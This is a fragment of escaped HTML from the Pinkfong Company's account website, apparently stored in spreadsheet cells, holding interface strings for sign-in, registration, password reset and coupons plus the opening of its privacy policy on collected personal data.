src="https://assets-pid-cdn.pinkfong.com/_next/static/chunks/pages/terms-57ce22cca9c5adbb.js" defer=""&gt;&lt;/script&gt;&lt;script src="https://assets-pid-cdn.pinkfong.com/_next/static/NCqgb5BLsl4uX3xni_4-R/_buildManifest.js" defer=""&gt;&lt;/script&gt;&lt;script src="https://assets-pid-cdn.pinkfong.com/_next/static/NCqgb5BLsl4uX3xni_4-R/_ssgManifest.js" defer=""&gt;&lt;/script&gt;&lt;script src="https://assets-pid-cdn.pinkfong.com/_next/static/NCqgb5BLsl4uX3xni_4-R/_middlewareManifest.js" defer=""&gt;&lt;/script&gt;&lt;link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@100;300;400;500;700&amp;family=Noto+Sans+JP:wght@100;300;400;500;700&amp;family=Noto+Sans+KR:wght@100;300;400;500;700&amp;display=swap"/&gt;&lt;/head&gt;&lt;body&gt;&lt;div id="__next"&gt;&lt;div class="Layout_container__qFn6D"&gt;&lt;header class="Header_header___P_0U"&gt;&lt;div class="container Header_container__UM_24"&gt;&lt;nav class="Header_nav__kfLpg"&gt;&lt;ul&gt;&lt;li class="Header_logo__biydZ"&gt;&lt;a href="/en"&gt;&lt;div class="Logo_container__IL8K4"&gt;&lt;span style="box-sizing:border-box;display:inline-block;overflow:hidden;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;position:relative;max-width:100%"&gt;&lt;span style="box-sizing:border-box;display:block;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0;max-width:100%"&gt;&lt;img style="display:block;max-width:100%;width:initial;height:initial;background:none;opacity:1;border:0;margin:0;padding:0" alt="" aria-hidden="true" src="data:image/svg+xml,%3csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20version=%271.1%27%20width=%27428%27%20height=%2766%27/%3e"/&gt;&lt;/span&gt;&lt;img alt="logo" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" decoding="async" data-nimg="intrinsic" style="position:absolute;top:0;left:0;bottom:0;right:0;box-sizing:border-box;padding:0;border:none;margin:auto;display:block;width:0;height:0;min-width:100%;max-width:100%;min-height:100%;max-height:100%"/&gt;&lt;noscript&gt;&lt;img alt="logo" srcSet="/_next/image?url=https%3A%2F%2Fassets-pid-cdn.pinkfong.com%2Fstatic%2Fimg%2Fpinkfong_logo_en.png&amp;amp;w=640&amp;amp;q=75 1x, /_next/image?url=https%3A%2F%2Fassets-pid-cdn.pinkfong.com%2Fstatic%2Fimg%2Fpinkfong_logo_en.png&amp;amp;w=1080&amp;amp;q=75 2x" src="/_next/image?url=https%3A%2F%2Fassets-pid-cdn.pinkfong.com%2Fstatic%2Fimg%2Fpinkfong_logo_en.png&amp;amp;w=1080&amp;amp;q=75" decoding="async" data-nimg="intrinsic" style="position:absolute;top:0;left:0;bottom:0;right:0;box-sizing:border-box;padding:0;border:none;margin:auto;display:block;width:0;height:0;min-width:100%;max-width:100%;min-height:100%;max-height:100%" loading="lazy"/&gt;&lt;/noscript&gt;&lt;/span&gt;&lt;/div&gt;&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;div class="ant-dropdown-trigger LanguageNav_menu__ruCrN"&gt;&lt;svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 496 512" style="font-size:15px" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"&gt;&lt;path d="M336.5 160C322 70.7 287.8 8 248 8s-74 62.7-88.5 152h177zM152 256c0 22.2 1.2 43.5 3.3 64h185.3c2.1-20.5 3.3-41.8 3.3-64s-1.2-43.5-3.3-64H155.3c-2.1 20.5-3.3 41.8-3.3 64zm324.7-96c-28.6-67.9-86.5-120.4-158-141.6 24.4 33.8 41.2 84.7 50 141.6h108zM177.2 18.4C105.8 39.6 47.8 92.1 19.3 160h108c8.7-56.9 25.5-107.8 49.9-141.6zM487.4 192H372.7c2.1 21 3.3 42.5 3.3 64s-1.2 43-3.3 64h114.6c5.5-20.5 8.6-41.8 8.6-64s-3.1-43.5-8.5-64zM120 256c0-21.5 1.2-43 3.3-64H8.6C3.2 212.5 0 233.8 0 256s3.2 43.5 8.6 64h114.6c-2-21-3.2-42.5-3.2-64zm39.5 96c14.5 89.3 48.7 152 88.5 152s74-62.7 88.5-152h-177zm159.3 141.6c71.4-21.2 129.4-73.7 158-141.6h-108c-8.8 56.9-25.6 107.8-50 141.6zM19.3 352c28.6 67.9 86.5 120.4 158 141.6-24.4-33.8-41.2-84.7-50-141.6h-108z"&gt;&lt;/path&gt;&lt;/svg&gt;&lt;span class="d-none d-sm-inline-block LanguageNav_title__k6qp_" style="margin-left:8px;font-size:14px"&gt;English&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/nav&gt;&lt;/div&gt;&lt;/header&gt;&lt;main class="main"&gt;&lt;div class="container Terms_container__rNgWc"&gt;&lt;div class="fr-view"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/main&gt;&lt;footer class="Footer_footer__MKm4f"&gt;&lt;div class="container"&gt;&lt;div&gt; Copyright © The Pinkfong Company, Inc.</t>
  </si>
  <si>
    <t>All Rights Reserved.&lt;/div&gt;&lt;div&gt;&lt;button type="button" class="ant-btn ant-btn-link"&gt;Privacy&lt;/button&gt;&lt;button type="button" class="ant-btn ant-btn-link"&gt;Terms&lt;/button&gt;&lt;a class="ant-typography Footer_link__vGrAs"&gt;Support&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/footer&gt;&lt;/div&gt;&lt;/div&gt;&lt;script id="__NEXT_DATA__" type="application/json"&gt;{"props":{"pageProps":{"messages":{"INPUT.LOGIN":"Sign In","BUTTON.REGISTRATION":"Create Account","TEXT.PINKFONG_INTEGRATED_LOGIN":"Sign in to your Pinkfong account","INPUT.EMAIL":"Email","INPUT.PASSWORD":"Password","INPUT.KEEP_SESSION":"Keep me signed in","BUTTON.REGISTER":"Sign up for free","BUTTON.REMEMBER_EMAIL":"Remember me","BUTTON.PASSWORD_RESET":"Forgot your password?","TEXT.PINKFONG_REGISTRATION_GUIDE":"Create your Pinkfong Account and get more member benefits. Each member can easily log in to various Pinkfong services through a single Pinkfong Account.</t>
  </si>
  <si>
    <t>","BUTTON.LOGIN":"Sign In","TEXT.CREATE_YOUR_ACCOUNT":"Create your Pinkfong account","INPUT.CONFIRM_PASSWORD":"Confirm Password","INPUT.COUNTRY":"Country or Region","INPUT.PHONE":"Phone Number","BUTTON.SEND_VERIFICATION_CODE":"Send Code","BUTTON.SUBMIT":"Submit","BUTTON.RESEND_VERIFICATION_CODE":"Resend","INPUT.AGREE_ALL":"I agree to all the terms and conditions. ","INPUT.I_AM_ADULT":"I’m</t>
  </si>
  <si>
    <t>at least 14 years old. ","INPUT.AGREE_PRIVACY_POLICY":"I agree to the Privacy Policy.","INPUT.AGREE_SERVICE_POLICY":"I agree to the Terms of Service.</t>
  </si>
  <si>
    <t>","INPUT.AGREE_STORE_POLICY":"I agree to the Terms of PinkfongStore.","INPUT.AGREE_TV_APP_POLICY":"I agree to the Terms of Pinkfong TV App.","INPUT.AGREE_EMAIL":"(Optional) I agree to receive email newsletters from Pinkfong.","INPUT.AGREE_SMS":"(Optional)</t>
  </si>
  <si>
    <t>I agree to receive additional text messages. ","BUTTON.CONTINUE":"Continue","BUTTON.PREV":"Back","INPUT.I_DO_NOT_HAVE_CHILDREN":"I do not have children","TEXT.ABOUT_YOUR_CHILD":"About Your Child","TEXT.CHILD_INFORMATION_ADVANTAGE":"You can get personalized suggestions and special offers. ","TEXT.CHILD_NAME_OR_NICKNAME":"Your child’s name or nickname","TEXT.CHILD_BIRTHDAY":"Your child's month of birth","BUTTON.ADD_CHILDREN":"Add</t>
  </si>
  <si>
    <t>Another Child","BUTTON.SIGN_UP_COMPLETE":"Continue","TEXT.THANKS_FOR_SIGNING_UP":"Thanks for signing up!","BUTTON.START":"Start","TEXT.REGISTRATION_COMPLETE_MESSAGE":"We have just sent you an email to verify your email address. Please check your email and click on the link to activate your account.\r\nIf you can't find the email, please check your spam/junk folder. ","TEXT.USER_INFORMATION":"Account Info","TEXT.PROFILE":"Profile","TEXT.COMPLETE":"Complete","TEXT.WELCOME_SIGNING_UP":"Welcome to Pinkfong","TEXT.LOGOUT_ING":"Signing Out...","TEXT.ACCOUNT_SETTING":"Account Settings","TEXT.CHILDREN_INFORMATION":"Child Profile","TEXT.SUBSCRIPTION_INFO":"Subscription Info.","TEXT.NOTIFICATION":"Notification","TEXT.DELETE_MY_ACCOUNT":"Delete account","TEXT.VERIFICATION_CODE":"Verification</t>
  </si>
  <si>
    <t>Code","BUTTON.LOGOUT":"Sign Out","TEXT.CHANGE_PASSWORD":"Change Password","TEXT.CURRENT_PASSWORD":"Current password","TEXT.FILL_YOUR_NEW_PASSWORD":"Enter your new password. (min. 8 characters)","TEXT.CONFIRM_PASSWORD":"Confirm Password","TEXT.PASSWORD_CHANGE_GUIDE":"Please enter the current password and new password.</t>
  </si>
  <si>
    <t>{br}Confirm your new password. ","TEXT.PASSWORD_RULE":"At least 8 characters with 2 types of upper/lower case letters, numbers, and special characters. ","TEXT.PASSWORD_ENTER_AGAIN":"Re-enter your password confirmation to match your password.</t>
  </si>
  <si>
    <t>","BUTTON.UPDATE_PASSWORD":"Change Password","TEXT.PASSWORD_UPDATED":"Password Updated","TEXT.PASSWORD_SUCCESSFULLY_UPDATED":"Your Password has been successfully updated. ","BUTTON.BACK_TO_ACCOUNT_SETTING":"Back</t>
  </si>
  <si>
    <t>to account settings","TEXT.RESET_PASSWORD":"Reset Password","TEXT.FORGOT_YOUR_PASSWORD":"Forgot your password?{br}Please reset your password below. ","BUTTON.RESET_BY_EMAIL":"By Email","BUTTON.RESET_BY_PHONE":"By Mobile","TEXT.EMAIL_RESET_GUIDE":"Please provide the email address you used when you signed up for your Pinkfong Account.\r\nWe will send you an email with a link to reset your password. ","BUTTON.EMAIL_RESET_SUBMIT":"Submit","TEXT.RESET_PASSWORD_COMPLETE":"Password</t>
  </si>
  <si>
    <t>Updated","TEXT.RESET_PASSWORD_COMPLETE_MESSAGE":"Password has been successfully updated.{br}You can now sign in to your account using your new password. ","BUTTON.GO_TO_PINKFONG_ID_WEBSITE":"Go to sign in","TEXT.PASSWORD_RESET_MESSAGE":"Enter the new password for your Pinkfong account.\r\n{br}You can only reset an account associated with a verified mobile number. ","TEXT.EMAIL_ACCOUNT_WITH":"Email</t>
  </si>
  <si>
    <t>account{br}{email}","BUTTON.RESET_MY_PASSWORD":"Reset my password","TEXT.EMAIL_CONFIRMED":"Verified","TEXT.EMAIL_CONFIRMED_SUCCESSFULLY":"Your email address has been successfully verified. ","TEXT.CHILD_NAME_OR_NICKNAME_PLACEHOLDER":"(Maximum 20 characters)","HTML.EMAIL_RESET_SENT_MESSAGE":"An email with password reset instructions has beed sent to your email address.\r\n\u003cbr /\u003eIf</t>
  </si>
  <si>
    <t>you haver not received an email from us within a few minutes, \u003cbr /\u003e\u003cb\u003eplease check your spam/junk folder. \u003c/b\u003e","TEXT.DELETE_PINKFONG_ACCOUNT":"Delete Pinkfong account","HTML.DELETE_PINKFONG_ACCOUNT_MESSAGE":"Deleting your Pinkfong Account means: \u003cbr/\u003e1) You will no longer enjoy Pinkfong's services, including Pinkfong Plus. \u003cbr/\u003e2) All your personal info will be deleted. \u003cbr/\u003e3) You will not be able to sign up again with the same email address.\u003cbr/\u003e\u003cbr/\u003e\r\n\r\nPlease review the conditions below before deleting your account: If you have made purchases directly through Apple App Store, Google Play, or Amazon App Store, \u003cfont style=\"color: red;\"\u003e\u003cu\u003eyour payment will not be automatically cancelled.\u003c/u\u003e\u003c/font\u003e\u003cbr/\u003e\r\n\u003cb\u003eTo cancel your subscription, please follow the instructions below:\u003c/b\u003e\u003cbr/\u003e\u003cbr/\u003e\r\n\u003cul\u003e\r\n    \u003cli\u003e\r\n        \u003cu\u003e\u003ca href=\"https://support.google.com/googleplay/answer/7018481\" target=\"_blank\"\u003eGoogle Play:\u003c/a\u003e\u003c/u\u003e Google Play \u003e</t>
  </si>
  <si>
    <t>Top left menu \u003e Subscriptions\r\n    \u003c/li\u003e\r\n    \u003cbr/\u003e\r\n    \u003cli\u003e\r\n        \u003cu\u003e\u003ca href=\"https://support.apple.com/HT202039\" target=\"_blank\"\u003eiPhone, iPad:\u003c/a\u003e\u003c/u\u003e Settings \u003e Apple ID \u003e Subscriptions\r\n    \u003c/li\u003e\r\n    \u003cbr/\u003e\r\n    \u003cli\u003e\r\n        \u003cu\u003e\u003ca href=\"https://www.amazon.com/gp/help/customer/display.html?nodeId=GDT2SXJJ7K49JKYE\" target=\"_blank\"\u003eAmazon:\u003c/a\u003e\u003c/u\u003e Amazon App Store \u003e Top left menu \u003e Subscriptions\r\n    \u003c/li\u003e\r\n\u003c/ul\u003e\r\n\u003cbr/\u003e\r\n\u003cb\u003eNote: \u003cbr/\u003eYour Pinkfong Account can be restored within 30 days of your account deletion.\u003c/b\u003e After 30 days, all your account information cannot be restored.\u003cbr/\u003e\u003cbr/\u003e\r\nEnter your Pinkfong password for verification.\u003cbr/\u003e\u003cbr/\u003e","INPUT.COUNTRY_CODE":"Country/Region Code","BUTTON.SHOW_POLICY_DETAIL":"Read More","TEXT.SMS_EMAIL_ADVANTAGE":"You can receive occasional news, events, and special offers via email or text messages.</t>
  </si>
  <si>
    <t>","BUTTON.VERIFY":"Verify","TEXT.POLICY_TABLE_TITLE":"[Important Legal Notice]","TEXT.POLICY_TABLE_SUB_TITLE":"The whole sentences of Terms \u0026 Conditions is posted above as 'Read More'. ","TABLE.DIVIDE":"Category","TABLE.PURPOSE":"Purpose","TABLE.ITEM":"Information","TABLE.PERIOD":"Period of collection and usage","ERROR.EMAIL_ALREADY_EXISTS":"A user with that email address already exists in the system.</t>
  </si>
  <si>
    <t>Either request a forgotten password or enter a different email address. ","ERROR.DUPLICATE_EMAIL_ERROR":"An error has occurred with your email address. Please try again in a few minutes.</t>
  </si>
  <si>
    <t>","ERROR.CHILDREN_INPUT_EXCEED":"You can register up to 4 children. ","ERROR.INVALID_EMAIL":"The email address you entered has been typed incorrectly. ","ERROR.EMAIL_REQUIRED":"Please enter your email.</t>
  </si>
  <si>
    <t>","ERROR.PASSWORD_REQUIRED":"Enter your password. ","TEXT.PHONE_VERIFICATION_REQUIRED":"Mobile phone verification is canceled. Another account verified this number.</t>
  </si>
  <si>
    <t>","BUTTON.CHANGE_PHONE":"Add/Change","BUTTON.CANCEL":"Cancel","ERROR.SOMETHING_WENT_WRONG":"Something went wrong. ","ERROR.SERVICE_TEMPORARILY_UNAVAILABLE":"The service is currently unavailable.\u003cbr /\u003ePlease try again later.","TEXT.EMAIL_LINK_SENT":"A verification link has been sent to your email account.</t>
  </si>
  <si>
    <t>Please click on the link that has just been sent. ","ERROR.SOMETHING_WENT_WRONG_TRY_AGAIN":"An error has occurred. Please try again in a few minutes.</t>
  </si>
  <si>
    <t>","ERROR.PASSWORD_MIN_LENGTH":"Password is too short. (minimum is 8 characters)","ERROR.PASSWORD_COMBINE":"Please combine 2 types of upper/lower case letters, numbers, and special characters. ","ERROR.PASSWORD_CONFIRM_WRONG":"Password confirmation does not match password.</t>
  </si>
  <si>
    <t>","ERROR.PASSWORD_ENTER_AGAIN":"Please re-enter your password. ","ERROR.SELECT_COUNTRY":"Please choose your country or region. ","ERROR.INVALID_PHONE":"Please enter a valid phone number.</t>
  </si>
  <si>
    <t>","ERROR.ENTER_PHONE":"Please enter your phone number. ","ERROR.VERIFY_PHONE":"Please verify your mobile phone. ","ERROR.AGREEMENT_REQUIRED":"Please agree to all the terms and conditions before signing up.</t>
  </si>
  <si>
    <t>","ERROR.CHILDREN_INPUT_EXCEED_SIMPLE":"You can register up to 4 children. ","TEXT.CHILDREN_WITHOUT_BIRTHDAY_MESSAGE":"If you enter your child's month of birth, you can receive suggestions and special offers suitable for your child.</t>
  </si>
  <si>
    <t>Would you still like to skip this part and continue?","TEXT.CHILDREN_WITHOUT_NAME_MESSAGE":"Are you sure you want to continue without the child's name/nickname?","ERROR.SAME_PASSWORD":"Please enter a new password. ","ERROR.SMS_TRY_COUNT_EXCEED":"Unable to verify. Please try again later.</t>
  </si>
  <si>
    <t>","ERROR.SMS_TIME_LIMIT":"Please wait 10 seconds before resending the verification code. ","ERROR.SMS_SEND_FAILED":"Sending failed. Please try again in a few minutes.</t>
  </si>
  <si>
    <t>","ERROR.VERIFICATION_CODE_WRONG":"Failed to verify. Please check your verification code and try again. ","TEXT.BIRTHDAY":"Month of Birth","ERROR.CAPTCHA_REQUIRED":"Please verify that you are not a robot.</t>
  </si>
  <si>
    <t>","ERROR.CAPTCHA_EXPIRED":"Verification expired. Check the checkbox again. ","BUTTON.DEACTIVATE":"Delete</t>
  </si>
  <si>
    <t>Account","BUTTON.MODIFY":"Edit","BUTTON.SAVE":"Save","HTML.PHONE_RESET_GUIDE":"Please enter your phone number.\u003cbr/\u003e\r\nAfter mobile verification is complete, you can reset your password.\u003cbr/\u003e\r\n(Only available if your mobile phone number is verified in your account)","TEXT.UNLOCK_INACTIVE_ACCOUNT":"Your account is inactive. ","HTML.UNLOCK_ACCOUNT_MESSAGE":"Happy to see you again! Please reactivate your inactive Pinkfong account.</t>
  </si>
  <si>
    <t>\u003cbr /\u003e\r\nTo keep your account safe, we make your account which is not logged-in over 1 year inactivate. Please click 'Activate My Account' button to stay active and use the service.","BUTTON.UNLOCK_INACTIVE_ACCOUNT":"Activate</t>
  </si>
  <si>
    <t>My Account","BUTTON.NO":"No","TEXT.UNSUPPORTED_BROWSER":"Sorry, your browser is out of date and no longer supported. ","TEXT.UNSUPPORTED_BROWSER_MESSAGE":"For the best Pinkfong experience, please upgrade your browser to the latest version!","ERROR.EMAIL_DELETED":"Your email account has been deleted.</t>
  </si>
  <si>
    <t>","TEXT.PINKFONG_ACCOUNT_DELETED":"Your account has been deleted. Goodbye. ","ERROR.PASSWORD_INCORRECT":"The password you entered is invalid.</t>
  </si>
  <si>
    <t>","ERROR.CHILDREN_NAME_LIMIT":"Names must not exceed 20 characters in length. ","TABLE.DIVIDE_CONTENT":"Required","TABLE.PURPOSE_CONTENT":"User identification, Contact for service implementation","TABLE.ITEM_CONTENT":"Email, password, country, phone number","TABLE.PERIOD_CONTENT":"For 7 days after account deletion.</t>
  </si>
  <si>
    <t>","BUTTON.OK":"OK","TEXT.PRIVACY":"Privacy","TEXT.TERMS":"Terms","TEXT.SUPPORT":"Support","TEXT.EU_BLOCKED_TITLE":"Unfortunately, our website is currently unavailable in most European countries. ","TEXT.EU_BLOCKED_SUB_TITLE":"We are engaged on the issue and committed to looking at options that support our full range of digital offerings to the EU market. We apologize for any inconvenience and look forward to serving you soon.</t>
  </si>
  <si>
    <t>","ERROR.EU_BLOCKED":"Unfortunately, our website is currently unavailable in most European countries. We apologize for any inconvenience and look forward to serving you soon. ","ERROR.NOT_INACTIVE_USER":"Your account is not inactive.</t>
  </si>
  <si>
    <t>","ERROR.INVALID_PHONE_REQUEST":"The phone number you have entered does not match your account. Please reset with your email. ","ERROR.LANGUAGE_CHANGED_TOO_OFTEN":"You cannot change the language too often.</t>
  </si>
  <si>
    <t>Wait for 10 seconds to try again. ","TEXT.SMS_AGREED_NOTIFICATION":"You have agreed to receive additional text messages from Pinkfong on {date}","TEXT.SMS_DISAGREED_NOTIFICATION":"You have withdrawn your consent to receive additional text messages from Pinkfong on {date}.","TEXT.EMAIL_AGREED_NOTIFICATION":"You have agreed to receive emails from Pinkfong on {date}","TEXT.EMAIL_DISAGREED_NOTIFICATION":"You have withdrawn your consent to receive marketing emails on {date}.","TEXT.ADD_YOUR_PHONE":"Please add your phone number.","TEXT.SERVICE_STATUS_SUBSCRIPTION":"Subscribed","TEXT.SERVICE_STATUS_ERROR":"Payment Error","TEXT.SERVICE_STATUS_CANCEL":"Subscription Canceled","TEXT.SERVICE_EXPIRED_DATE":"Expiry Date: {date}","TEXT.CHECK_PAYMENT_INFORMATION":"Please check payment info from your devices.</t>
  </si>
  <si>
    <t>","TEXT.COUPON_AND_SAVED_MONEY":"Available Coupons","TEXT.USED_COUPON_LIST":"Used or Expired Coupons","TEXT.LAST_THREE_MONTHS":"(Last 3 Months)","TEXT.COUPON_DATE":"Valid until","TEXT.ADVANTAGE_DATE":"Service Period","TEXT.SAVED_MONEY_DATE":"Reward points expiration date","BUTTON.VIEW_DETAILS":"See more","TEXT.STORE_EXPIRE_DATE":"Expiration date: 6 months after point collection","TEXT.PINKFONG_MEMBERSHIP_COUPON":"Pinkfong Membership Coupon","TEXT.COUPON_DETAILS_DATE":"Service Period","TEXT.COUPON_DETAILS_HOW_TO":"How to use","TEXT.COUPON_DETAILS_CAUTION":"Terms and Conditions","TEXT.COUPON_DETAILS_DATE_UNTIL":"~ {date}","BUTTON.GO_TO_APP":"Open App","BUTTON.APPLY_COUPON":"Redeem coupon","BUTTON.AVAILABLE_IN_MOBILE":"Available on mobile","BUTTON.GO_TO_STORE":"Visit Pinkfong Store","BUTTON.GO_TO_USE_COUPON":"Redeem coupon","TEXT.COUPON_IS_USED":"Redeemed","TEXT.COUPON_IS_EXPIRED":"Expired","TEXT.PERMANENT_AFTER_PURCHASE":"No expiration date","TEXT.N_DAYS_AFTER_APPLYING":"{n} days from the coupon redemption","TEXT.N_MONTHS_AFTER_SAVING":"{n} months from point collection","BUTTON.ENTER_COUPON":"Submit","TEXT.ENTER_COUPON_PLACEHOLDER":"Enter coupon/promo code","ERROR.FAILED_APPLYING_COUPON":"Could not redeem coupon. Please contact customer service via CS@pinkfong.com</t>
  </si>
  <si>
    <t>[{errorCode}]","TEXT.SUCCESS_APPLYING_COUPON":"The coupon has been redeemed. ","TEXT.SUCCESS_ENTER_COUPON":"The coupon has been redeemed successfully.","ERROR.FAILED_ENTER_COUPON":"Coupon code is invalid.</t>
  </si>
  <si>
    <t>","TEXT.STORE_REGISTRATION_COMPLETE_MESSAGE":"We have just sent you an email to verify your email address. Please check your email and click on the link to activate your account.\r\nIf you can't find the email, please check your spam/junk folder. ","BUTTON.NEXT":"Next step","PRIVACY_POLICY":"\u003cp\u003e\u003cstrong\u003ePrivacy Policy\u003c/strong\u003e\u003c/p\u003e\u003chr\u003e\u003cstyle\u003etd {border: 1px solid #000000;}\u003c/style\u003e\u003cp\u003e\u0026nbsp;\u003c/p\u003e\u003cp\u003eThe Pinkfong Integrated Services(the “Pinkfong Services”), including the Pinkfong Store website/mobile application services, Pinkfong TV mobile application services, Pinkfong Homeschool Play mobile application services, Pinkfong Homeschool services and Pinkfong interactive mobile application services Pinkfong official website and Pinkfong business help center services operated by The Pinkfong Company, Inc.(the “Company”) value users’ personal information and do their best to ensure users have their personal information provided to the Pinkfong Services protected while using the services.\u003c/p\u003e\u003cp\u003e\u003cbr\u003e\u003cstrong\u003eArticle 1 General Provisions\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e1.</t>
  </si>
  <si>
    <t>The Pinkfong Services inform, via the Privacy Policy, users of the purpose and method of the use of their personal information and measures taken to protect their personal information.\u0026nbsp;\u003c/p\u003e\u003cp\u003e2. Users are advised to check this Privacy Policy as they access the Pinkfong Services as this policy is subject to change according to amendment to laws or guidelines on the protection of personal information or the Company’s policy.\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eArticle 2 Consent to Processing of Personal Information\u003c/strong\u003e\u003c/p\u003e\u003cp\u003eThe Pinkfong Services operate procedures enabling users to click the ‘consent’ or ‘withdrawal’ button on the Company’s processing of Personal Information. The user is deemed to have consented to the processing of his/her personal information upon clicking the ‘consent’ button.</t>
  </si>
  <si>
    <t>If the user does not consent to the processing of Personal Information, he/she may be restricted from using any part of the Pinkfong Services.\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eArticle 3 Collected Personal information; Method of Collection\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e1. The Pinkfong Services are provided with information required to provide services for users’ application for membership registration or use of mobile application services as follows.\u003c/p\u003e\u003cp style=\"margin-left: 20px;\"\u003ea. Collected personal information\u003c/p\u003e\u003cp style=\"margin-left: 40px;\"\u003e1) Registration for integrated membership\u003c/p\u003e\u003cp style=\"margin-left: 60px;\"\u003e[Required Items]: ID(email address as ID), password, contact information(telephone/mobile-phone number), Country\u003cbr\u003e[Optional Items]: Children’s nicknames and birth year and month\u003c/p\u003e\u003cp style=\"margin-left: 40px;\"\u003e2) Scope of personal information that may be collected during the use of services and business operation\u003c/p\u003e\u003cp style=\"margin-left: 60px;\"\u003ea)</t>
  </si>
  <si>
    <t>Pinkfong Store\u003cbr\u003e\u003cbr\u003e- Name, address, contact information\u003cbr\u003e- Records of use/suspension of services, access log, cookie, access IP information\u003cbr\u003e- (Product purchase, payment and delivery, refund service) Payment information on bank account/credit card, point-card number, transaction history, whether a cash receipt is issued, etc.\u003cbr\u003e- (Product purchase, payment and delivery, refund service) Delivery information, including the address/name/contact information of the recipient\u003cbr\u003e- (Mobile device) Device identification number, OS information, advertising identifier, telecommunications company, whether ‘PUSH’ is received\u003cbr\u003e- (Purchase of overseas delivered product)</t>
  </si>
  <si>
    <t>Customs ID number\u003cbr\u003e- (Questionnaire and event) Other selective personal information\u003c/p\u003e\u003cp style=\"margin-left: 60px;\"\u003eb) Pinkfong TV Mobile Application Services\u003cbr\u003e\u003cbr\u003e- Initial service device identification number(device ID or IMEI), region format\u003cbr\u003e- Information on the user’s status(account name, nickname, store name in use)\u003cbr\u003e- Photograph, cookie, date of visit, service use log, improper use log\u003cbr\u003e- (KakaoTalk-/Facebook-linked service) KakaoTalk/Facebook ID\u003cbr\u003e\u003cbr\u003ec)</t>
  </si>
  <si>
    <t>Pinkfong Homeschool Mobile Application Services\u003cbr\u003e- Name, address, contact information\u003cbr\u003e- Records of use/suspension of services, access log, cookie, access IP information\u003cbr\u003e- Delivery information, including the address/name/contact information of the recipient\u003cbr\u003e- (Mobile device) Device identification number, OS information, advertising identifier, telecommunications company, whether ‘PUSH’ notification is received\u003cbr\u003e- (Purchase of overseas delivered product) Customs ID number\u003cbr\u003e- (Survey and event) Other selective personal information\u003c/p\u003e\u003cp style=\"margin-left: 60px;\"\u003ed) Pinkfong Interactive Mobile Application Services\u003cbr\u003e- Initial service device identification number(device ID or IMEI), region format\u003cbr\u003e-</t>
  </si>
  <si>
    <t>Device information(model, device type, OS version)\u003cbr\u003e- Photograph, cookie, date of visit, service use log, improper use log\u003cbr\u003e- (KakaoTalk-/Instagram/Facebook-linked service) KakaoTalk/Instagram/Facebook ID\u003c/p\u003e\u003cp style=\"margin-left: 60px;\"\u003ed) Pinkfong Business Help Center\u003cbr\u003e- (Submitting a request) email, name, contact information\u003c/p\u003e\u003cp style=\"margin-left: 20px;\"\u003eb. Method of collection\u003c/p\u003e\u003cp style=\"margin-left: 20px;\"\u003e- Website, bulletin board, telephone, fax, event, delivery request\u003cbr\u003e- Collection of information generated via log-analysis programs and by cookies\u003cbr\u003e- Provision from affiliates and purchasers\u003cbr\u003e- Collection via smartphone applications\u003cbr\u003e-</t>
  </si>
  <si>
    <t>Voluntary supply from users upon their registration for, or use of, services or customer counselling\u003c/p\u003e\u003cp style=\"margin-left: 20px;\"\u003ec. Location information\u003c/p\u003e\u003cp style=\"margin-left: 20px;\"\u003eThe Company does not collect, store or use information with which an individual’s location can be identified. However, certain advertisement banners operated by third parties, may collect, without storage, via location-recognition advertisements of advertising-service providers as such third parties, and temporarily use, location information with a device’s censor data, etc. that may provide actual location information (including GPS signals from mobile devices) or information on nearby Wi-Fi access points and base stations.</t>
  </si>
  <si>
    <t>However, such use of location information is unrelated to the Company.\u003c/p\u003e\u003cp\u003e2. Users’ personal information collected is destroyed immediately after the purpose of its collection is achieved. The Company does not collect sensitive personal information that may infringe users’ basic human rights or use for any purpose other than that notified in advance to users, or divulge to third parties, personal information provided from them.\u003c/p\u003e\u003cp\u003e3.</t>
  </si>
  <si>
    <t>Measure taken by the Company for the member’s provision of false information\u003cbr\u003eThe member must guarantee the accuracy and legitimacy of his/her information. If the member submits false information in various ways, including the stealing of another person’s information, in violation of the provision above, the Company may report such member under applicable laws and deprive him/her of his/her membership.\u003c/p\u003e\u003cp\u003e4. The user shall be solely liable for losses or problems suffered by him/her due to personal information he/she voluntarily disclosed.</t>
  </si>
  <si>
    <t>The user is advised to recognize that personal information made public can be collected and used, without his/her permission, by another person, and that he/she may suffer unwanted damage caused thereby.\u003c/p\u003e\u003cp\u003e5. The Company may access and use information within the customer’s mobile communication device as follows for its mobile application services. The Company explains, and obtains consent to, access to required items upon the installation, or first execution, of a mobile application, and obtains separate consent to access to optional items upon the first use of such mobile application.</t>
  </si>
  <si>
    <t>The method of obtaining consent to access to optional items may vary depending on the OS version, however, there is no restriction on the use of basic services by a member refusing to give consent.\u003c/p\u003e\u003cp\u003e\u003cstrong\u003e[Pinkfong TV Application]\u003c/strong\u003e\u003c/p\u003e\u003ctable style=\"width: 100%;\"\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd style=\"width: 33.3333%; background-color: rgb(239, 239, 239);\"\u003e\u003cstrong\u003eRequired or Optional\u003c/strong\u003e\u003c/td\u003e\u003ctd style=\"width: 33.3333%; background-color: rgb(239, 239, 239);\"\u003e\u003cstrong\u003eItem\u003c/strong\u003e\u003c/td\u003e\u003ctd style=\"width: 33.3333%; background-color: rgb(239, 239, 239);\"\u003e\u003cstrong\u003ePurpose\u003c/strong\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd style=\"width: 33.3333%;\"\u003eRequired\u003c/td\u003e\u003ctd style=\"width: 33.3333%;\"\u003eDevice ID, application record\u003c/td\u003e\u003ctd style=\"width: 33.3333%;\"\u003eExamination of application status(version) upon initial 